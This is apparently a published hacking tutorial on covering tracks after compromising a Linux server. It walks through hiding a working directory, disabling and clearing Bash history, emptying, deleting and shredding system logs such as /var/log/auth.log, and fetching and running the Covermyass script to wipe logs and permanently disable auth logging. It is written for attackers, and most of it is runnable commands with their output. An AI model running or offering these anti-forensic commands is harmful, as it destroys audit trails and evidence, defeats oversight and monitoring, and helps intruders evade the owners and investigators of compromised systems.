Clear the Logs & Bash History on Hacked Linux Systems to Cover Your Tracks & Remain Undetected

Apr 16, 2021 08:00 PM
Apr 16, 2021 08:45 PM
637171906392347646.jpg

As a hacker, the final stage of exploitation is covering their tracks, which involves wiping all activity and logs so that they can avoid being detected. It's especially crucial for persistence if the target will be accessed again in the future by the attacker.

To show you the basics of covering your tracks, we'll compromise a target first, then explore some techniques used to delete Bash history, clear logs, and remain hidden after exploiting a Linux system. You can check out our Cyber Weapons Lab video below that outlines my guide or skip below to get right to the written steps.

Step 1: Compromise a Target

The first thing we need to do is exploit the target. We can use command injection to abuse the way the server handles OS commands to get a shell. We'll also want to upgrade our new shell to a fully interactive one. Doing so will make it easier to work in general, and it will also let us use tab completion and terminal history.

After that, we can escalate our privileges to root so we can better take advantage of the system to remain undetected.

Step 2: Create an Easy-to-Delete Hidden Directory

Once we have root access, we can create a hidden directory to work out of and keep any scripts or files in. It won't fool anyone but the most noobie admin, but another layer of discretion certainly couldn't hurt. First, let's locate any writable directories with the following command:

root@target:/# find / -perm -222 -type d 2>/dev/null

/dev/shm
/var/lock
/var/lib/php5
/var/tmp
/var/www/dav
/var/www/twiki/data/Sandbox
/var/www/twiki/data/Main
/var/www/twiki/data/Know
/var/www/twiki/data/TWiki
/var/www/twiki/data/_default
/var/www/twiki/data/Trash
/var/www/twiki/pub/Sandbox
/var/www/twiki/pub/Main
/var/www/twiki/pub/Know
/var/www/twiki/pub/Know/IncorrectDllVersionW32PTH10DLL
/var/www/twiki/pub/TWiki
/var/www/twiki/pub/TWiki/TWikiDocGraphics
/var/www/twiki/pub/TWiki/TWikiTemplates
/var/www/twiki/pub/TWiki/TWikiLogos
/var/www/twiki/pub/TWiki/PreviewBackground
/var/www/twiki/pub/TWiki/FileAttachment
/var/www/twiki/pub/TWiki/WabiSabi
/var/www/twiki/pub/Trash
/var/www/twiki/pub/icn
/tmp
/tmp/.ICE-unix
/tmp/.X11-unix

We can create a hidden directory with the mkdir command and by prepending the name with a dot:

root@target:/# mkdir /dev/shm/.secret

If we list the contents of /dev/shm now, nothing shows up:

root@target:/# ls -l /dev/shm/

total 0

Only when we use the -a switch to list all files and directories does it show up:

root@target:/# ls -la /dev/shm/

total 0
drwxrwxrwt  3 root root    60 2019-06-19 13:49 .
drwxr-xr-x 13 root root 13480 2019-06-19 13:41 ..
drwxr-xr-x  2 root root    40 2019-06-19 13:49 .secret

And to remove the directory once we are finished on the machine, use the rmdir command:

root@target:/# rmdir /dev/shm/.secret/

Step 3: Delete the Bash History

Bash keeps a list of commands used in the current session in memory, so it's important to clear it to cover your tracks. We can view the current history with the history command:

root@target:/# history

    1  cd /
    2  ls
    3  find / -perm -222 -type d 2>/dev/null
    4  cd /dev/shm/
    5  cd /
    6  mkdir /dev/shm/.secret
    7  ls -l /dev/shm/
    8  ls -la /dev/shm/
    9  ls
   10  rmdir /dev/shm/.secret/
   11  history

Commands are written to the HISTFILE environment variable, which is usually .bash_history. We can echo it to see the location:

root@target:/# echo $HISTFILE

/root/.bash_history

We can use the unset command to remove the variable:

root@target:/# unset HISTFILE

So when we echo it again, nothing shows up:

root@target:/# echo $HISTFILE

We can also make sure the command history isn't stored by sending it to /dev/null. Set the variable to it:

root@target:/# HISTFILE=/dev/null

Or do the same with the export command:

root@target:/# export HISTFILE=/dev/null

And the history will now be sent to /dev/null (nowhere):

root@target:/# echo $HISTFILE

/dev/null

We can set the number of commands to be stored during the current session to 0 using the HISTSIZE variable:

root@target:/# HISTSIZE=0

Alternatively, use the export command:

root@target:/# export HISTSIZE=0

We can also change the number of lines allowed in the history file using the HISTFILESIZE variable. Set this to 0:

root@target:/# HISTFILESIZE=0

Or with export:

root@target:/# export HISTFILESIZE=0

The set command can be used to change shell options as well. To disable the history option, use the following command:

root@target:/# set +o history

And to enable it again:

root@target:/# set -o history

Similarly, the shopt command can be used to change shell options. To disable history, use the following command:

root@target:/# shopt -ou history

And to enable it again:

root@target:/# shopt -os history

While running commands on the target system, we can sometimes avoid saving them to history by starting the command with a leading space:

root@target:~#  cat /etc/passwd

That technique doesn't work all the time and depends on the system.

We can also just clear the history using the -c switch:

root@target:~# history -c

To make sure the changes are written to disk, use the -w switch:

root@target:~# history -w

That will only clear the history for the current session. To absolutely make sure the history is cleared when exiting a session, the following command comes in handy:

root@target:/# cat /dev/null > ~/.bash_history && history -c && exit

We can also use the kill command to exit the session without saving history:

root@target:/# kill -9 $$

Step 4: Clear the Log Files

In addition to Bash history, log files also need to be wiped to remain undetected. Here are some common log files and what they contain:

  • /var/log/auth.log Authentication
  • /var/log/cron.log Cron Jobs
  • /var/log/maillog Mail
  • /var/log/httpd Apache

Of course, we can simply remove a log with the rm command:

root@target:/# rm /var/log/auth.log

But that will likely raise red flags, so it's better to empty the file rather than erase it completely. We can use the truncate command to shrink the size to 0:

root@target:/# truncate -s 0 /var/log/auth.log

Please note, truncate is not always present on all systems.

We can accomplish the same thing by echoing nothing into the file:

root@target:/# echo '' > /var/log/auth.log

And also with > by itself to empty the file:

root@target:/# > /var/log/auth.log

We can also send it to /dev/null:

root@target:/# cat /dev/null > /var/log/auth.log

Or use the tee command:

root@target:/# true | tee /var/log/auth.log

We can also use the dd command to write nothing to the log file:

root@target:/# dd if=/dev/null of=/var/log/auth.log

0+0 records in
0+0 records out
0 bytes (0 B) copied, 6.1494e-05 s, 0.0 kB/s

The shred command can be used to overwrite a file with meaningless binary data:

root@target:/# shred /var/log/auth.log

We can even tack on -zu which will truncate the file and overwrite it with zeros to hide evidence of shredding:

root@target:/# shred -zu /var/log/auth.log

Step 5: Use a Tool to Ensure Things Are Erased

To increase the chances that any activity on the target goes undiscovered, we can use a tool to make sure everything gets erased. Covermyass is a script that will automate much of the processes we've already covered, including clearing log files and disabling Bash history.

We can grab the script from GitHub using wget (assuming we have access to the internet on the target, otherwise, it will have to be transferred manually):

root@target:/# wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass

Head to a writable directory, and use chmod to make it executable:

root@target:/tmp# chmod +x covermyass

Then we can run it:

root@target:/tmp# ./covermyass

Welcome to Cover my ass tool !

Select an option :

1) Clear logs for user root
2) Permenently disable auth & bash history
3) Restore settings to default
99) Exit tool

>

We're given a custom prompt with a few options to choose from. Let's select the first one to clear the logs:

> 1

[+] /var/log/messages cleaned.
[+] /var/log/auth.log cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.

Reminder: your need to reload the session to see effects.
Type exit to do so.

We can also disable Bash and auth history with option 2:

> 2

[+] Permanently sending /var/log/auth.log to /dev/null
[+] Permanently sending bash_history to /dev/null
[+] Set HISTFILESIZE & HISTSIZE to 0
[+] Disabled history library

Permenently disabled bash log.

And in case you need to clear everything in a hurry, simply append now to the command:

root@target:/tmp# ./covermyass now

[+] /var/log/messages cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.

Reminder: your need to reload the session to see effects.
Type exit to do so.

Wrapping Up

Today, we explored various techniques used to cover tracks and remain undetected on a compromised machine. We covered ways to disable and delete Bash history, methods to clear log files, and utilized the Covermyass tool to ensure our activity on the target was wiped. There are other ways to clear certain traces of an attack, like using Metasploit, using shell scripting, or doing it on a hacked Windows machine, but the above should be everything you need for a basic Linux computer.

Cover image by Vojtech Okenka/Pexels

Comments

No Comments Exist

Be the first, drop a comment!